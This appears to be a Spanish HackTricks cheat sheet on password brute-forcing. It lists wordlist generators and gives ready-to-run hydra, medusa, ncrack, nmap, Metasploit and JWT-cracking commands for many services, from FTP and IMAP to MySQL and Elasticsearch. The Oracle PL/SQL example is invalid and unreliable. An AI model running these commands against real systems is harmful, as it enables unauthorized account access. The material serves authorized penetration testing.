105 KiB
Fuerza Bruta - Hoja de trucos
Utilice Trickest para construir y automatizar fácilmente flujos de trabajo con las herramientas comunitarias más avanzadas del mundo.
Obtenga acceso hoy mismo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el oficial PEASS & HackTricks swag
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.
Credenciales predeterminadas
Busque en Google las credenciales predeterminadas de la tecnología que se está utilizando, o pruebe estos enlaces:
- https://github.com/ihebski/DefaultCreds-cheat-sheet
- http://www.phenoelit.org/dpl/dpl.html
- http://www.vulnerabilityassessment.co.uk/passwordsC.htm
- https://192-168-1-1ip.mobi/default-router-passwords-list/
- https://datarecovery.com/rd/default-passwords/
- https://bizuns.com/default-passwords-list
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv
- https://github.com/Dormidera/WordList-Compendium
- https://www.cirt.net/passwords
- http://www.passwordsdatabase.com/
- https://many-passwords.github.io/
- https://theinfocentric.com/
Crea tus propios diccionarios
Encuentra la mayor cantidad de información posible sobre el objetivo y genera un diccionario personalizado. Herramientas que pueden ayudar:
Crunch
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
Cewl
Cewl es una herramienta de generación de listas de palabras clave que se utiliza en pruebas de penetración y en ataques de fuerza bruta. Esta herramienta se utiliza para recopilar palabras clave relevantes a partir de un sitio web o de un archivo de texto. Cewl utiliza técnicas de web scraping para extraer palabras clave de páginas web y generar una lista de palabras clave que pueden ser utilizadas en ataques de fuerza bruta.
Para utilizar Cewl, simplemente debes proporcionarle una URL o un archivo de texto como entrada. La herramienta rastreará el sitio web o analizará el archivo de texto y extraerá las palabras clave relevantes. Puedes especificar la profundidad de rastreo y otros parámetros para refinar los resultados.
Una vez que Cewl haya generado la lista de palabras clave, puedes utilizarla en ataques de fuerza bruta para intentar adivinar contraseñas o realizar otros tipos de ataques. Es importante tener en cuenta que el uso de Cewl para fines maliciosos es ilegal y puede tener consecuencias legales graves.
Cewl es una herramienta útil para los profesionales de la seguridad informática y los expertos en pruebas de penetración. Puede ayudar a identificar posibles vulnerabilidades en un sistema y fortalecer la seguridad de una organización. Sin embargo, es importante utilizar esta herramienta de manera ética y legal, y obtener el consentimiento adecuado antes de realizar pruebas de penetración en un sistema.
cewl example.com -m 5 -w words.txt
CUPP
Genera contraseñas basadas en tu conocimiento sobre la víctima (nombres, fechas...)
python3 cupp.py -h
Wister
Una herramienta generadora de listas de palabras, que te permite proporcionar un conjunto de palabras, dándote la posibilidad de crear múltiples variaciones a partir de las palabras dadas, creando una lista de palabras única e ideal para usar en relación a un objetivo específico.
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____|__ __| ____| __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __| | _ /
\ /\ / _| |_ ____) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
pydictor
Listas de palabras
- https://github.com/danielmiessler/SecLists
- https://github.com/Dormidera/WordList-Compendium
- https://github.com/kaonashi-passwords/Kaonashi
- https://github.com/google/fuzzing/tree/master/dictionaries
- https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
- https://weakpass.com/wordlist/
- https://wordlists.assetnote.io/
- https://github.com/fssecur3/fuzzlists
- https://hashkiller.io/listmanager
- https://github.com/Karanxa/Bug-Bounty-Wordlists
Utiliza Trickest para construir y automatizar flujos de trabajo utilizando las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy mismo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Servicios
Ordenados alfabéticamente por nombre de servicio.
AFP
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run
AJP
El Protocolo de Conector de Java (AJP, por sus siglas en inglés) es un protocolo de red utilizado para la comunicación entre un servidor web y un servidor de aplicaciones Java. AJP se utiliza comúnmente en entornos de servidor web que ejecutan aplicaciones Java, como Apache Tomcat.
El objetivo principal de AJP es mejorar el rendimiento y la eficiencia de la comunicación entre el servidor web y el servidor de aplicaciones Java. AJP utiliza un formato de paquete binario compacto y optimizado para minimizar el tamaño de los datos transmitidos y reducir la sobrecarga de la red.
Una técnica común de ataque que se puede utilizar contra servidores AJP es el ataque de fuerza bruta. En este tipo de ataque, un atacante intenta adivinar la contraseña de un usuario probando diferentes combinaciones de contraseñas hasta encontrar la correcta. Esto se logra enviando solicitudes AJP con diferentes contraseñas y verificando si el servidor responde con éxito.
Para protegerse contra los ataques de fuerza bruta en servidores AJP, es importante implementar medidas de seguridad adecuadas, como el uso de contraseñas fuertes y la configuración adecuada de las políticas de bloqueo de cuentas. Además, se recomienda monitorear de cerca los registros del servidor en busca de actividades sospechosas y aplicar parches de seguridad regularmente para protegerse contra vulnerabilidades conocidas.
nmap --script ajp-brute -p 8009 <IP>
Cassandra
Cassandra es un sistema de base de datos distribuida altamente escalable y de alto rendimiento. Utiliza un modelo de datos basado en columnas y está diseñado para manejar grandes volúmenes de datos en múltiples nodos sin un único punto de fallo.
Ataques de fuerza bruta
Los ataques de fuerza bruta son una técnica común utilizada para obtener acceso no autorizado a sistemas protegidos. En el contexto de Cassandra, un ataque de fuerza bruta implica intentar adivinar las credenciales de acceso de un usuario mediante la prueba de diferentes combinaciones de nombres de usuario y contraseñas.
Herramientas de fuerza bruta
Existen varias herramientas disponibles para llevar a cabo ataques de fuerza bruta en sistemas Cassandra. Algunas de las herramientas más populares incluyen:
- Hydra: una herramienta de línea de comandos que admite ataques de fuerza bruta en varios protocolos, incluido el protocolo de autenticación de Cassandra.
- Medusa: una herramienta similar a Hydra que también es capaz de realizar ataques de fuerza bruta en sistemas Cassandra.
- Ncrack: una herramienta de código abierto que se especializa en ataques de fuerza bruta y autenticación en diversos protocolos, incluido Cassandra.
Mitigación de ataques de fuerza bruta
Para protegerse contra los ataques de fuerza bruta en Cassandra, se recomienda implementar las siguientes medidas de seguridad:
- Utilizar contraseñas fuertes y complejas que sean difíciles de adivinar.
- Limitar el número de intentos de inicio de sesión permitidos antes de bloquear una cuenta.
- Implementar mecanismos de bloqueo de cuentas temporales después de un número determinado de intentos fallidos.
- Utilizar autenticación de dos factores para agregar una capa adicional de seguridad.
Al implementar estas medidas, se puede reducir significativamente el riesgo de un ataque de fuerza bruta exitoso en un sistema Cassandra.
nmap --script cassandra-brute -p 9160 <IP>
CouchDB
CouchDB es una base de datos NoSQL de código abierto que utiliza JSON para almacenar datos. Es conocida por su capacidad de replicación y su capacidad de manejar grandes cantidades de datos distribuidos en múltiples servidores.
Ataques de fuerza bruta
Un ataque de fuerza bruta es un método utilizado por los hackers para descubrir contraseñas o claves de acceso a través de la prueba sistemática de todas las combinaciones posibles. En el caso de CouchDB, un ataque de fuerza bruta se puede utilizar para intentar adivinar la contraseña de un usuario y obtener acceso no autorizado a la base de datos.
Herramientas de fuerza bruta
Existen varias herramientas disponibles para llevar a cabo ataques de fuerza bruta en CouchDB. Algunas de las herramientas más populares incluyen:
- Hydra: una herramienta de fuerza bruta en línea de comandos que admite varios protocolos, incluido HTTP utilizado por CouchDB.
- Medusa: una herramienta de fuerza bruta en línea de comandos que también admite varios protocolos, incluido HTTP.
- Ncrack: una herramienta de autenticación en línea de comandos que puede realizar ataques de fuerza bruta en varios protocolos, incluido HTTP.
Mitigación de ataques de fuerza bruta
Para proteger CouchDB contra ataques de fuerza bruta, se recomienda seguir las siguientes prácticas de seguridad:
- Utilizar contraseñas fuertes: asegurarse de que las contraseñas sean lo suficientemente largas y complejas como para resistir los ataques de fuerza bruta.
- Implementar bloqueo de cuentas: configurar CouchDB para bloquear una cuenta después de un número determinado de intentos fallidos de inicio de sesión.
- Limitar el acceso remoto: restringir el acceso a CouchDB solo a direcciones IP confiables o a través de una VPN.
- Mantener el software actualizado: asegurarse de que CouchDB esté actualizado con los últimos parches de seguridad para mitigar vulnerabilidades conocidas.
Al seguir estas prácticas de seguridad, se puede reducir significativamente el riesgo de un ataque de fuerza bruta exitoso en CouchDB.
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
Registro de Docker
Un registro de Docker es un servicio que permite almacenar y distribuir imágenes de Docker. Es similar a un repositorio de código fuente, pero en lugar de almacenar código, almacena imágenes de contenedores Docker.
El registro de Docker puede ser público o privado. Un registro público es accesible para cualquier persona y se utiliza comúnmente para compartir imágenes de contenedores con la comunidad. Por otro lado, un registro privado es utilizado por organizaciones para almacenar imágenes de contenedores internamente y restringir el acceso a usuarios autorizados.
El acceso a un registro de Docker se realiza a través de la API de Docker, que permite realizar operaciones como subir, descargar y buscar imágenes de contenedores. Para autenticarse en un registro privado, se requiere un nombre de usuario y una contraseña.
El registro de Docker también puede ser utilizado como una herramienta de seguridad. Por ejemplo, se puede configurar para escanear imágenes de contenedores en busca de vulnerabilidades conocidas antes de permitir su implementación.
En resumen, un registro de Docker es una parte fundamental de la infraestructura de contenedores y proporciona un lugar centralizado para almacenar y distribuir imágenes de contenedores Docker.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
Elasticsearch
Elasticsearch es un motor de búsqueda y análisis distribuido de código abierto, diseñado para almacenar, buscar y analizar grandes volúmenes de datos en tiempo real. Es ampliamente utilizado en aplicaciones web y sistemas de registro para indexar y buscar información de manera eficiente.
Ataques de fuerza bruta
Un ataque de fuerza bruta es una técnica común utilizada para obtener acceso no autorizado a sistemas o cuentas. Consiste en probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. En el contexto de Elasticsearch, un ataque de fuerza bruta se puede utilizar para intentar adivinar las credenciales de acceso a un clúster de Elasticsearch.
Herramientas de fuerza bruta
Existen varias herramientas disponibles para llevar a cabo ataques de fuerza bruta en Elasticsearch. Algunas de las más populares son:
- Hydra: una herramienta de línea de comandos que admite ataques de fuerza bruta en varios protocolos, incluido HTTP utilizado por Elasticsearch.
- Medusa: una herramienta de fuerza bruta en línea de comandos que admite ataques en varios protocolos, incluido HTTP.
- Patator: una herramienta de fuerza bruta y diccionario que admite múltiples protocolos, incluido HTTP.
Mitigación de ataques de fuerza bruta
Para proteger un clúster de Elasticsearch contra ataques de fuerza bruta, se pueden implementar las siguientes medidas de seguridad:
- Políticas de contraseñas fuertes: se deben establecer políticas de contraseñas que requieran contraseñas largas y complejas.
- Bloqueo de cuentas: se puede configurar Elasticsearch para bloquear una cuenta después de un número determinado de intentos fallidos de inicio de sesión.
- Autenticación de dos factores: se puede habilitar la autenticación de dos factores para agregar una capa adicional de seguridad al proceso de inicio de sesión.
- Actualizaciones regulares: se deben aplicar las actualizaciones de seguridad más recientes para protegerse contra vulnerabilidades conocidas.
Es importante tener en cuenta que ninguna medida de seguridad es completamente infalible, por lo que es fundamental mantenerse actualizado sobre las últimas amenazas y vulnerabilidades, y tomar las medidas necesarias para proteger su clúster de Elasticsearch.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
FTP
El Protocolo de Transferencia de Archivos (FTP, por sus siglas en inglés) es un protocolo estándar utilizado para transferir archivos entre un cliente y un servidor en una red. El FTP utiliza un enfoque de autenticación basado en contraseñas para verificar la identidad del usuario y permite la transferencia de archivos tanto en modo binario como en modo ASCII.
Ataques de fuerza bruta contra FTP
Un ataque de fuerza bruta contra FTP es un método utilizado para descubrir las credenciales de acceso de un servidor FTP mediante la prueba de todas las combinaciones posibles de nombres de usuario y contraseñas. Este tipo de ataque puede ser efectivo si el servidor FTP no tiene medidas de seguridad adecuadas, como bloqueo de cuentas después de un número determinado de intentos fallidos.
Herramientas de fuerza bruta para FTP
Existen varias herramientas disponibles para llevar a cabo ataques de fuerza bruta contra servidores FTP. Algunas de las herramientas más populares incluyen Hydra, Medusa y Ncrack. Estas herramientas permiten a los hackers automatizar el proceso de prueba de credenciales y pueden probar miles de combinaciones en poco tiempo.
Mitigación de ataques de fuerza bruta contra FTP
Para protegerse contra los ataques de fuerza bruta contra FTP, es importante implementar medidas de seguridad adecuadas. Algunas de las medidas que se pueden tomar incluyen:
- Establecer políticas de contraseñas fuertes y obligar a los usuarios a cambiar sus contraseñas periódicamente.
- Limitar el número de intentos de inicio de sesión fallidos antes de bloquear una cuenta.
- Utilizar autenticación de dos factores para agregar una capa adicional de seguridad.
- Mantener el software del servidor FTP actualizado con los últimos parches de seguridad.
- Monitorear los registros de actividad del servidor FTP en busca de actividades sospechosas.
Implementar estas medidas puede ayudar a prevenir los ataques de fuerza bruta y proteger la seguridad de los servidores FTP.
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
Fuerza Bruta Genérica HTTP
WFuzz
Autenticación Básica HTTP
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
HTTP - Enviar formulario mediante POST
El método de ataque de fuerza bruta mediante el envío de formularios HTTP POST es una técnica comúnmente utilizada para intentar adivinar contraseñas o descubrir información sensible. Este método se basa en enviar múltiples solicitudes POST a un servidor web, probando diferentes combinaciones de nombres de usuario y contraseñas hasta encontrar la correcta.
Pasos para realizar un ataque de fuerza bruta mediante HTTP POST:
-
Identificar el formulario objetivo: Analiza el sitio web objetivo y encuentra el formulario de inicio de sesión o cualquier otro formulario que desees atacar.
-
Configurar la herramienta de ataque: Utiliza una herramienta de fuerza bruta, como Hydra o Burp Suite, para configurar los parámetros de la solicitud POST. Estos parámetros incluyen la URL del formulario, los campos de entrada (como nombre de usuario y contraseña) y una lista de posibles combinaciones.
-
Ejecutar el ataque: Inicia el ataque enviando las solicitudes POST a través de la herramienta seleccionada. La herramienta probará todas las combinaciones posibles de nombres de usuario y contraseñas hasta encontrar una coincidencia.
-
Analizar los resultados: Una vez finalizado el ataque, analiza los resultados para identificar las combinaciones exitosas. Estas combinaciones pueden ser utilizadas para acceder a la cuenta objetivo o para obtener información sensible.
Es importante tener en cuenta que el uso de esta técnica puede ser ilegal y está sujeto a sanciones legales. Solo debes realizar pruebas de penetración en sistemas para los cuales tienes permiso explícito.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
Para https tienes que cambiar de "http-post-form" a "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla o (D)rupal o (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
IMAP
IMAP (Internet Message Access Protocol) es un protocolo de correo electrónico que permite a los usuarios acceder y administrar sus correos electrónicos almacenados en un servidor remoto. A diferencia del protocolo POP (Post Office Protocol), que descarga los correos electrónicos en el dispositivo del usuario, IMAP mantiene los correos electrónicos en el servidor, lo que permite un acceso más flexible y sincronizado desde múltiples dispositivos.
Ataque de fuerza bruta contra IMAP
Un ataque de fuerza bruta contra IMAP es un método utilizado por los hackers para intentar adivinar las credenciales de acceso de un usuario mediante la prueba de diferentes combinaciones de nombres de usuario y contraseñas. Este tipo de ataque se basa en la suposición de que el usuario ha elegido una contraseña débil o fácil de adivinar.
Para llevar a cabo un ataque de fuerza bruta contra IMAP, los hackers utilizan herramientas automatizadas que generan y prueban miles o incluso millones de combinaciones de nombres de usuario y contraseñas en un corto período de tiempo. Estas herramientas aprovechan la velocidad de procesamiento de las computadoras para probar una gran cantidad de combinaciones en poco tiempo.
Para protegerse contra los ataques de fuerza bruta en IMAP, es importante utilizar contraseñas seguras y robustas que sean difíciles de adivinar. Además, se recomienda implementar medidas de seguridad adicionales, como la autenticación de dos factores, que requiere un segundo factor de autenticación además de la contraseña para acceder a la cuenta de correo electrónico.
En resumen, los ataques de fuerza bruta contra IMAP son una técnica común utilizada por los hackers para intentar obtener acceso no autorizado a las cuentas de correo electrónico. Los usuarios deben tomar medidas para proteger sus cuentas, como utilizar contraseñas seguras y habilitar la autenticación de dos factores.
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
IRC (Internet Relay Chat) es un protocolo de comunicación en tiempo real ampliamente utilizado para la comunicación en línea. Permite a los usuarios participar en conversaciones grupales o privadas a través de canales de chat. Los canales de IRC son similares a las salas de chat, donde los usuarios pueden unirse y participar en discusiones sobre diversos temas. IRC utiliza un modelo cliente-servidor, donde los clientes se conectan a servidores IRC para unirse a los canales y comunicarse con otros usuarios. Los clientes de IRC pueden ser aplicaciones de software dedicadas o clientes web basados en navegador. IRC ha sido utilizado históricamente por la comunidad de hackers y sigue siendo una herramienta popular en el mundo de la seguridad informática.
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
ISCSI
iSCSI (Internet Small Computer System Interface) es un protocolo de red que permite a los dispositivos de almacenamiento en red (como discos duros, cintas y unidades de estado sólido) ser accesibles a través de una red IP. Utiliza el protocolo TCP/IP para transmitir comandos SCSI (Small Computer System Interface) entre un iniciador (cliente) y un destino (servidor). El objetivo del iSCSI es proporcionar una solución de almacenamiento de bajo costo y alta velocidad para entornos de red.
El proceso de conexión iSCSI implica la autenticación del iniciador con el destino y la creación de una sesión de iSCSI. Una vez establecida la sesión, el iniciador puede enviar comandos SCSI al destino para acceder y manipular los datos almacenados en los dispositivos de almacenamiento en red.
El ataque de fuerza bruta en iSCSI implica intentar adivinar las credenciales de autenticación del iniciador para obtener acceso no autorizado al destino. Esto se logra probando diferentes combinaciones de nombres de usuario y contraseñas hasta encontrar las correctas. Los atacantes pueden utilizar herramientas automatizadas para realizar ataques de fuerza bruta en iSCSI y comprometer la seguridad de los sistemas de almacenamiento en red. Es importante implementar medidas de seguridad adecuadas, como el uso de contraseñas fuertes y la limitación de intentos de inicio de sesión, para proteger los sistemas iSCSI contra ataques de fuerza bruta.
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
JWT
JSON Web Token (JWT) es un estándar abierto (RFC 7519) que define un formato compacto y seguro para transmitir información entre partes como un objeto JSON. Está compuesto por tres partes: el encabezado, la carga útil y la firma.
El encabezado contiene información sobre el tipo de token y el algoritmo de firma utilizado. La carga útil contiene los datos que se desean transmitir. La firma se utiliza para verificar la integridad del token y asegurar que no haya sido modificado.
El uso de JWT es común en aplicaciones web y móviles para autenticación y autorización. Un escenario típico es cuando un usuario inicia sesión en una aplicación y recibe un JWT como respuesta. Este token se puede enviar en cada solicitud posterior para verificar la identidad del usuario y permitir el acceso a recursos protegidos.
Una técnica común para atacar JWT es el ataque de fuerza bruta. En este tipo de ataque, un atacante intenta adivinar la clave secreta utilizada para firmar el token. Esto se logra probando diferentes combinaciones de claves hasta encontrar la correcta.
Para protegerse contra ataques de fuerza bruta, es importante utilizar claves seguras y algoritmos de firma robustos. Además, se recomienda implementar medidas de seguridad adicionales, como limitar el número de intentos de autenticación y monitorear los registros en busca de actividad sospechosa.
En resumen, JWT es un estándar utilizado para transmitir información de forma segura entre partes. Sin embargo, es importante tomar precauciones para protegerse contra ataques de fuerza bruta y garantizar la seguridad de los tokens utilizados en las aplicaciones.
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
LDAP (Lightweight Directory Access Protocol) es un protocolo de aplicación utilizado para acceder y mantener servicios de directorio. Es comúnmente utilizado para autenticación y búsqueda de información en un directorio centralizado. El protocolo LDAP utiliza un enfoque de autenticación basado en credenciales, lo que significa que los usuarios deben proporcionar sus credenciales (como nombre de usuario y contraseña) para acceder a los servicios de directorio.
El ataque de fuerza bruta es una técnica común utilizada para comprometer sistemas LDAP. En este tipo de ataque, un atacante intenta adivinar las credenciales de un usuario probando diferentes combinaciones de nombres de usuario y contraseñas. El atacante puede utilizar herramientas automatizadas para realizar miles o incluso millones de intentos en poco tiempo.
Para protegerse contra los ataques de fuerza bruta en LDAP, es importante implementar medidas de seguridad adecuadas. Algunas de estas medidas incluyen:
- Establecer políticas de contraseñas fuertes: se deben requerir contraseñas que sean difíciles de adivinar y que contengan una combinación de letras, números y caracteres especiales.
- Limitar el número de intentos de inicio de sesión: se pueden implementar mecanismos que bloqueen temporalmente una cuenta después de un número determinado de intentos fallidos de inicio de sesión.
- Implementar autenticación de dos factores: esto agrega una capa adicional de seguridad al requerir un segundo factor de autenticación, como un código generado por una aplicación móvil, además de las credenciales habituales.
- Monitorear y registrar los intentos de inicio de sesión fallidos: esto puede ayudar a identificar patrones de ataque y tomar medidas preventivas adicionales.
Al implementar estas medidas de seguridad, se puede reducir significativamente el riesgo de un ataque de fuerza bruta en sistemas LDAP.
nmap --script ldap-brute -p 389 <IP>
MQTT
MQTT (Message Queuing Telemetry Transport) es un protocolo de mensajería ligero y de bajo consumo de energía diseñado para la comunicación entre dispositivos en redes de área local o de ancho de banda limitado. MQTT utiliza un modelo de publicación/suscripción, donde los dispositivos pueden publicar mensajes en un tema específico y otros dispositivos pueden suscribirse a ese tema para recibir los mensajes.
El protocolo MQTT es ampliamente utilizado en aplicaciones de Internet de las cosas (IoT) debido a su eficiencia y simplicidad. Sin embargo, también puede ser utilizado en otros escenarios donde se requiere una comunicación eficiente y confiable entre dispositivos.
El proceso de ataque de fuerza bruta en MQTT implica intentar adivinar las credenciales de autenticación de un dispositivo MQTT mediante la prueba de diferentes combinaciones de nombres de usuario y contraseñas. Este tipo de ataque es posible cuando los dispositivos MQTT están mal configurados y utilizan credenciales débiles o predeterminadas.
Para llevar a cabo un ataque de fuerza bruta en MQTT, se utilizan herramientas especializadas que automatizan el proceso de prueba de credenciales. Estas herramientas intentan diferentes combinaciones de nombres de usuario y contraseñas hasta que encuentran las credenciales correctas.
Es importante tener en cuenta que realizar un ataque de fuerza bruta en sistemas o dispositivos sin permiso es ilegal y puede tener consecuencias legales graves. Este tipo de ataque solo debe ser realizado por profesionales de seguridad autorizados y como parte de un proceso de prueba de penetración ética.
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
Mongo
Mongo es una base de datos NoSQL ampliamente utilizada en aplicaciones web y móviles. Al ser una base de datos NoSQL, Mongo no utiliza tablas y filas como las bases de datos relacionales tradicionales, sino que almacena los datos en documentos JSON flexibles. Esto permite una mayor escalabilidad y flexibilidad en el almacenamiento y consulta de datos.
Sin embargo, al igual que cualquier otra base de datos, Mongo también puede ser vulnerable a ataques de fuerza bruta. La fuerza bruta es un método de ataque en el que un hacker intenta adivinar la contraseña correcta probando diferentes combinaciones hasta encontrar la correcta.
Para proteger una base de datos Mongo contra ataques de fuerza bruta, es importante seguir algunas buenas prácticas de seguridad. Estas incluyen:
-
Utilizar contraseñas fuertes: Asegúrese de utilizar contraseñas largas y complejas que sean difíciles de adivinar. Evite contraseñas comunes o predecibles.
-
Limitar el acceso remoto: Restrinja el acceso remoto a la base de datos solo a las direcciones IP autorizadas. Esto ayudará a prevenir ataques de fuerza bruta desde ubicaciones no autorizadas.
-
Implementar bloqueo de cuentas: Configure su base de datos Mongo para bloquear automáticamente las cuentas después de un número determinado de intentos fallidos de inicio de sesión. Esto dificultará los ataques de fuerza bruta al limitar el número de intentos posibles.
-
Actualizar regularmente: Mantenga su base de datos Mongo actualizada con las últimas versiones y parches de seguridad. Esto ayudará a proteger contra vulnerabilidades conocidas que podrían ser explotadas en ataques de fuerza bruta.
Al seguir estas prácticas de seguridad, puede ayudar a proteger su base de datos Mongo contra ataques de fuerza bruta y mantener sus datos seguros.
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
MySQL
MySQL es un sistema de gestión de bases de datos relacional de código abierto ampliamente utilizado. Es conocido por su rendimiento, confiabilidad y facilidad de uso. MySQL utiliza el lenguaje de consulta estructurado (SQL) para administrar y manipular los datos almacenados en la base de datos.
Ataques de fuerza bruta contra MySQL
Un ataque de fuerza bruta es un método utilizado por los hackers para descubrir contraseñas o claves de acceso a través de la prueba sistemática de todas las combinaciones posibles. En el caso de MySQL, un ataque de fuerza bruta se puede utilizar para intentar adivinar la contraseña de un usuario con el fin de obtener acceso no autorizado a la base de datos.
Existen varias herramientas disponibles para llevar a cabo ataques de fuerza bruta contra MySQL. Estas herramientas automatizan el proceso de prueba de múltiples combinaciones de contraseñas en un corto período de tiempo. Algunas de las herramientas más populares incluyen Hydra, Medusa y SQLMap.
Para protegerse contra los ataques de fuerza bruta en MySQL, es importante seguir buenas prácticas de seguridad, como utilizar contraseñas fuertes y complejas, implementar bloqueos temporales después de varios intentos fallidos de inicio de sesión y mantener el software de MySQL actualizado con las últimas correcciones de seguridad.
Además, se recomienda utilizar medidas adicionales de seguridad, como la autenticación de dos factores y la limitación de acceso a la base de datos solo desde direcciones IP autorizadas.
En resumen, los ataques de fuerza bruta contra MySQL son una amenaza común en el mundo de la seguridad informática. Es importante tomar medidas proactivas para protegerse contra estos ataques y mantener la integridad de los datos almacenados en la base de datos.
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql
# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
Fuerza bruta
La fuerza bruta es una técnica comúnmente utilizada en el campo de la seguridad informática para descifrar contraseñas o encontrar información sensible. Consiste en probar todas las combinaciones posibles de caracteres hasta encontrar la correcta.
En el contexto de OracleSQL, la fuerza bruta se puede utilizar para intentar adivinar contraseñas de usuarios o nombres de esquemas. Esto se logra mediante la ejecución de consultas repetitivas con diferentes combinaciones de caracteres hasta encontrar la combinación correcta.
Es importante tener en cuenta que la fuerza bruta puede ser un proceso lento y consumir muchos recursos, especialmente si se utilizan contraseñas largas o complejas. Además, es una técnica que puede ser detectada fácilmente por sistemas de seguridad si se realizan demasiados intentos fallidos en un corto período de tiempo.
A continuación se muestra un ejemplo de cómo se puede implementar la fuerza bruta en OracleSQL para intentar adivinar una contraseña:
DECLARE
v_password VARCHAR2(20);
BEGIN
FOR i IN 1..10000 LOOP
v_password := 'password' || i;
BEGIN
EXECUTE IMMEDIATE 'ALTER SESSION SET CURRENT_SCHEMA = SCHEMA_NAME IDENTIFIED BY ' || v_password;
DBMS_OUTPUT.PUT_LINE('Contraseña encontrada: ' || v_password);
EXIT;
EXCEPTION
WHEN OTHERS THEN
NULL;
END;
END LOOP;
